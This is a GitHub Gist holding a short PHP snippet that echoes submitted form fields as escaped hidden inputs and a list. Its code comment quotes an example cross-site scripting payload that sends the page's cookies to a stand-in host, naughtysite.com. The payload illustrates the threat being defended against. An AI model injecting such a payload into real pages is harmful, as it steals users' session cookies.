Created
January 9, 2012 15:07
-
-
Save johnmckerrell/1583316 to your computer and use it in GitHub Desktop.
Original PealoCode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Defend from malicious input by using addslashes | |
| * A malicious user could craft a form that injected JavaScript into these hidden form fields, e.g.: | |
| * <input type="hidden" name="naughty" value=""><script>var img = new Image(); img.src='http://naughtysite.com/submitcookies.php?cookies='+document.cookies;</script>"> | |
| */ | |
| while (list($key, $val) = each($_POST)) { | |
| if ($key != 'Submit') { | |
| echo '<input type="hidden" name="' . htmlentities($key) . '" value="' . htmlentities($val) . '" />'; | |
| } | |
| } | |
| reset($_POST); | |
| echo '<ul>'; | |
| while (list($key, $val) = each($_POST)) { | |
| if ($key != 'Submit') { | |
| echo '<li><strong>' . htmlentities($key) . '</strong>: <span class="highlight-219ddb">' . htmlentities($val) . '</span></li>'; | |
| } | |
| } | |
| echo '</ul>'; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment